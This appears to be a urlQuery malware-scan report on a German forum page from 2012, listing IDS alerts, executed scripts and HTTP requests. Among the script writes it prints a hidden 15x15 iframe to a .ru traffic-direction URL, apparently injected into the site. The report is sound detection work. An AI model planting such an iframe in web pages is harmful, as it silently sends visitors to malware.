Overview

URLhttp://www.frozen-backside.de/index.php?page=Index
IP213.218.168.26
ASNAS29018 WebControl NOC DUS
Location Germany
Report completed2012-11-05 20:03:16 CET
StatusLoading report..
urlQuery Alerts Detected SutraTDS URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-05 20:02:25 173.194.69.95 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 1 reports on ASN: AS29018 WebControl NOC DUS

Date Alerts / IDS URL IP
2012-10-30 20:38:390 / 2http://dervertriebsspezialist.de/213.218.174.50



JavaScript

Executed Scripts (140)


Executed Evals (1)

#1 JavaScript::Eval (size: 3561, repeated: 12)

jQuery.easing['jswing'] = jQuery.easing['swing'];
jQuery.extend(jQuery.easing, {
    def: 'easeOutQuad',
    swing: function(x, t, b, c, d) {
        return jQuery.easing[jQuery.easing.def](x, t, b, c, d)
    },
    easeInQuad: function(x, t, b, c, d) {
        return c * (t /= d) * t + b
    },
    easeOutQuad: function(x, t, b, c, d) {
        return -c * (t /= d) * (t - 2) + b
    },
    easeInOutQuad: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t + b;
        return -c / 2 * ((--t) * (t - 2) - 1) + b
    },
    easeInCubic: function(x, t, b, c, d) {
        return c * (t /= d) * t * t + b
    },
    easeOutCubic: function(x, t, b, c, d) {
        return c * ((t = t / d - 1) * t * t + 1) + b
    },
    easeInOutCubic: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t * t + b;
        return c / 2 * ((t -= 2) * t * t + 2) + b
    },
    easeInQuart: function(x, t, b, c, d) {
        return c * (t /= d) * t * t * t + b
    },
    easeOutQuart: function(x, t, b, c, d) {
        return -c * ((t = t / d - 1) * t * t * t - 1) + b
    },
    easeInOutQuart: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t * t * t + b;
        return -c / 2 * ((t -= 2) * t * t * t - 2) + b
    },
    easeInQuint: function(x, t, b, c, d) {
        return c * (t /= d) * t * t * t * t + b
    },
    easeOutQuint: function(x, t, b, c, d) {
        return c * ((t = t / d - 1) * t * t * t * t + 1) + b
    },
    easeInOutQuint: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t * t * t * t + b;
        return c / 2 * ((t -= 2) * t * t * t * t + 2) + b
    },
    easeInSine: function(x, t, b, c, d) {
        return -c * Math.cos(t / d * (Math.PI / 2)) + c + b
    },
    easeOutSine: function(x, t, b, c, d) {
        return c * Math.sin(t / d * (Math.PI / 2)) + b
    },
    easeInOutSine: function(x, t, b, c, d) {
        return -c / 2 * (Math.cos(Math.PI * t / d) - 1) + b
    },
    easeInExpo: function(x, t, b, c, d) {
        return (t == 0) ? b : c * Math.pow(2, 10 * (t / d - 1)) + b
    },
    easeOutExpo: function(x, t, b, c, d) {
        return (t == d) ? b + c : c * (-Math.pow(2, -10 * t / d) + 1) + b
    },
    easeInOutExpo: function(x, t, b, c, d) {
        if (t == 0) return b;
        if (t == d) return b + c;
        if ((t /= d / 2) < 1) return c / 2 * Math.pow(2, 10 * (t - 1)) + b;
        return c / 2 * (-Math.pow(2, -10 * --t) + 2) + b
    },
    easeInCirc: function(x, t, b, c, d) {
        return -c * (Math.sqrt(1 - (t /= d) * t) - 1) + b
    },
    easeOutCirc: function(x, t, b, c, d) {
        return c * Math.sqrt(1 - (t = t / d - 1) * t) + b
    },
    easeInOutCirc: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return -c / 2 * (Math.sqrt(1 - t * t) - 1) + b;
        return c / 2 * (Math.sqrt(1 - (t -= 2) * t) + 1) + b
    },
    easeInElastic: function(x, t, b, c, d) {
        var s = 1.70158;
        var p = 0;
        var a = c;
        if (t == 0) return b;
        if ((t /= d) == 1) return b + c;
        if (!p) p = d * .3;
        if (a < Math.abs(c)) {
            a = c;
            var s = p / 4
        } else var s = p / (2 * Math.PI) * Math.asin(c / a);
        return -(a * Math.pow(2, 10 * (t -= 1)) * Math.sin((t * d - s) * (2 * Math.PI) / p)) + b
    },
    easeOutElastic: function(x, t, b, c, d) {
        var s = 1.70158;
        var p = 0;
        var a = c;
        if (t == 0) return b;
        if ((t /= d) == 1) return b + c;
        if (!p) p = d * .3;
        if (a < Math.abs(c)) {
            a = c;
            var s = p / 4
        } else var s = p / (2 * Math.PI) * Math.asin(c / a);
        return a * Math.pow(2, -10 * t) * Math.sin((t * d - s) * (2 * Math.PI) / p) + c + b
    },
    easeInOutElastic: function(x, t, b, c, d) {
        var s = 1.70158;
        var p = 0;
        var a = c;
        if (t == 0) return b;
        if ((t /= d / 2) == 2) return b + c;
        if (!p) p = d * (.3 * 1.5);
        if (a < Math.abs(c)) {
            a = c;
            var s = p / 4
        } else var s = p / (2 * Math.PI) * Math.asin(c / a);
        if (t < 1) return -.5 * (a * Math.pow(2, 10 * (t -= 1)) * Math.sin((t * d - s) * (2 * Math.PI) / p)) + b;
        return a * Math.pow(2, -10 * (t -= 1)) * Math.sin((t * d - s) * (2 * Math.PI) / p) * .5 + c + b
    },
    easeInBack: function(x, t, b, c, d, s) {
        if (s == undefined) s = 1.70158;
        return c * (t /= d) * t * ((s + 1) * t - s) + b
    },
    easeOutBack: function(x, t, b, c, d, s) {
        if (s == undefined) s = 1.70158;
        return c * ((t = t / d - 1) * t * ((s + 1) * t + s) + 1) + b
    },
    easeInOutBack: function(x, t, b, c, d, s) {
        if (s == undefined) s = 1.70158;
        if ((t /= d / 2) < 1) return c / 2 * (t * t * (((s *= (1.525)) + 1) * t - s)) + b;
        return c / 2 * ((t -= 2) * t * (((s *= (1.525)) + 1) * t + s) + 2) + b
    },
    easeInBounce: function(x, t, b, c, d) {
        return c - jQuery.easing.easeOutBounce(x, d - t, 0, c, d) + b
    },
    easeOutBounce: function(x, t, b, c, d) {
        if ((t /= d) < (1 / 2.75)) {
            return c * (7.5625 * t * t) + b
        } else if (t < (2 / 2.75)) {
            return c * (7.5625 * (t -= (1.5 / 2.75)) * t + .75) + b
        } else if (t < (2.5 / 2.75)) {
            return c * (7.5625 * (t -= (2.25 / 2.75)) * t + .9375) + b
        } else {
            return c * (7.5625 * (t -= (2.625 / 2.75)) * t + .984375) + b
        }
    },
    easeInOutBounce: function(x, t, b, c, d) {
        if (t < d / 2) return jQuery.easing.easeInBounce(x, t * 2, 0, c, d) * .5 + b;
        return jQuery.easing.easeOutBounce(x, t * 2 - d, 0, c, d) * .5 + c * .5 + b
    }
});

Executed Writes (41)

#1 JavaScript::Write (size: 147, repeated: 6)

<iframe src="http://nullifiedfilebyfile.ru/magicactionable.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>

#2 JavaScript::Write (size: 72, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/auth.js"></script>

#3 JavaScript::Write (size: 77, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/backplane.js"></script>

#4 JavaScript::Write (size: 75, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/counter.js"></script>

#5 JavaScript::Write (size: 76, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/curation.js"></script>

#6 JavaScript::Write (size: 90, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/community-flag.js"></script>

#7 JavaScript::Write (size: 84, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/curation.js"></script>

#8 JavaScript::Write (size: 85, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/form-auth.js"></script>

#9 JavaScript::Write (size: 80, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/like.js"></script>

#10 JavaScript::Write (size: 92, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/metadata-manager.js"></script>

#11 JavaScript::Write (size: 81, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/reply.js"></script>

#12 JavaScript::Write (size: 84, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/user-ban.js"></script>

#13 JavaScript::Write (size: 91, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/plugins/user-privileges.js"></script>

#14 JavaScript::Write (size: 74, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/stream.js"></script>

#15 JavaScript::Write (size: 74, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/submit.js"></script>

#16 JavaScript::Write (size: 77, repeated: 6)

<script src="http://cdn.echoenabled.com/clientapps/v2/user-list.js"></script>

#17 JavaScript::Write (size: 89, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/CustomReorder/CustomReorder.js"></script>

#18 JavaScript::Write (size: 93, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/EMBSubscription/EMBSubscription.js"></script>

#19 JavaScript::Write (size: 81, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/HoverCard/HoverCard.js"></script>

#20 JavaScript::Write (size: 83, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/UpdateSort/UpdateSort.js"></script>

#21 JavaScript::Write (size: 84, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/UpdateSort/UpdateSort2.js"></script>

#22 JavaScript::Write (size: 81, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/analytics/analytics.js"></script>

#23 JavaScript::Write (size: 77, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/forum/bumptopic.js"></script>

#24 JavaScript::Write (size: 72, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/forum/core.js"></script>

#25 JavaScript::Write (size: 72, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/forum/edit.js"></script>

#26 JavaScript::Write (size: 94, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/forum/jquery-ui-1.8.8.custom.min.js"></script>

#27 JavaScript::Write (size: 92, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/forum/jquery.ba-hashchange.min.js"></script>

#28 JavaScript::Write (size: 83, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/forum/localization/en.js"></script>

#29 JavaScript::Write (size: 73, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/jquery-pack.js"></script>

#30 JavaScript::Write (size: 69, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/lscache.js"></script>

#31 JavaScript::Write (size: 89, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/notifications/notifications.js"></script>

#32 JavaScript::Write (size: 77, repeated: 12)

<script src="http://cdn.realtidbits.com/libs/v1/rssfeed/rssfeed.js"></script>

#33 JavaScript::Write (size: 73, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/sonar.polls.js"></script>

#34 JavaScript::Write (size: 89, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/trendingposts/trendingposts.js"></script>

#35 JavaScript::Write (size: 69, repeated: 6)

<script src="http://cdn.realtidbits.com/libs/v1/ugcpoll.js"></script>

#36 JavaScript::Write (size: 110, repeated: 6)

<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js' type='text/javascript'></script>

#37 JavaScript::Write (size: 492, repeated: 6)

<script src='http://reg.sso.universalmusic.com/scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&thinRegistration=true' type='text/javascript'></script>

#38 JavaScript::Write (size: 135, repeated: 6)

<script type="text/javascript" src="http://www.ladygaga.com/aspnet_client/microgroove/shadowbox/adapters/shadowbox-jquery.js"></script>

#39 JavaScript::Write (size: 132, repeated: 6)

<script type="text/javascript" src="http://www.ladygaga.com/aspnet_client/microgroove/shadowbox/languages/shadowbox-en.js"></script>

#40 JavaScript::Write (size: 134, repeated: 6)

<script type="text/javascript" src="http://www.ladygaga.com/aspnet_client/microgroove/shadowbox/players/shadowbox-iframe.js"></script>

#41 JavaScript::Write (size: 131, repeated: 6)

<script type="text/javascript" src="http://www.ladygaga.com/aspnet_client/microgroove/shadowbox/players/shadowbox-img.js"></script>


HTTP Transactions (258)


Request Response
GET /index.php?page=Index HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Nov 2012 19:01:59 GMT
Server: Apache/2.2.22
X-Powered-By: PHP/5.2.17
Content-Encoding: gzip
Set-Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; HttpOnly wcf_boardLastActivityTime=1352142119; expires=Tue, 05-Nov-2013 19:01:59 GMT; HttpOnly
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /wcf/js/AjaxRequest.class.js HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 05 Nov 2012 15:00:29 GMT
Etag: &quot;2fc387a-a3b-4cdc0bf047d40&quot;
Accept-Ranges: bytes
Content-Length: 2619
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wcf/js/default.js HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 05 Nov 2012 15:00:29 GMT
Etag: &quot;2fc38aa-26e2-4cdc0bf047d40&quot;
Accept-Ranges: bytes
Content-Length: 9954
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /style/indexGalleryImages.css HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 30 Mar 2010 18:50:02 GMT
Etag: &quot;2fc0ad8-220-4830918de2a80&quot;
Accept-Ranges: bytes
Content-Length: 544
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wcf/js/PopupMenuList.class.js HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 05 Nov 2012 15:00:29 GMT
Etag: &quot;2fc3893-1d22-4cdc0bf047d40&quot;
Accept-Ranges: bytes
Content-Length: 7458
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /style/burningBoard.css HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Fri, 10 Jun 2011 14:53:51 GMT
Etag: &quot;2fc0ad7-12cb-4a55cbcdcbdc0&quot;
Accept-Ranges: bytes
Content-Length: 4811
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wcf/style/extra/print.css HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 16 Aug 2010 16:12:40 GMT
Etag: &quot;2fc3ef6-127e-48df31a05ce00&quot;
Accept-Ranges: bytes
Content-Length: 4734
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wcf/style/style-6.css HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Sat, 17 Sep 2011 17:28:34 GMT
Etag: &quot;2fc3ee1-159cb-4ad2670763480&quot;
Accept-Ranges: bytes
Content-Length: 88523
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wcf/images/avatars/avatar-default.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 07 Mar 2011 18:38:20 GMT
Etag: &quot;2fc2e7e-7cf-49de8ccc0bf00&quot;
Accept-Ranges: bytes
Content-Length: 1999
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wcf/icon/loginS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 16 Aug 2010 16:12:39 GMT
Etag: &quot;2fc2b17-32c-48df319f68bc0&quot;
Accept-Ranges: bytes
Content-Length: 812
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /js/BoardMarkAsRead.class.js HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 05 Nov 2012 15:00:29 GMT
Etag: &quot;2fc0985-798-4cdc0bf047d40&quot;
Accept-Ranges: bytes
Content-Length: 1944
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wcf/icon/languageEnS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 16 Aug 2010 16:12:39 GMT
Etag: &quot;2fc2ad5-37f-48df319f68bc0&quot;
Accept-Ranges: bytes
Content-Length: 895
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wcf/icon/registerS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 25 Sep 2007 14:20:28 GMT
Etag: &quot;2fc2bbd-3ba-43af67057a300&quot;
Accept-Ranges: bytes
Content-Length: 954
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /icon/calendarM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Fri, 30 Jul 2010 17:36:10 GMT
Etag: &quot;2fc08b9-483-48c9e4956f680&quot;
Accept-Ranges: bytes
Content-Length: 1155
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /wcf/icon/languageDeS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 16 Aug 2010 16:12:39 GMT
Etag: &quot;2fc2ad3-32b-48df319f68bc0&quot;
Accept-Ranges: bytes
Content-Length: 811
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /icon/portalM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Sun, 27 May 2012 10:38:05 GMT
Etag: &quot;2fc08f9-3bd-4c102324f5d40&quot;
Accept-Ranges: bytes
Content-Length: 957
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /icon/postM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:00 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 25 Sep 2007 14:22:32 GMT
Etag: &quot;2fc0903-2ee-43af677bbba00&quot;
Accept-Ranges: bytes
Content-Length: 750
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /wcf/icon/galleryM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
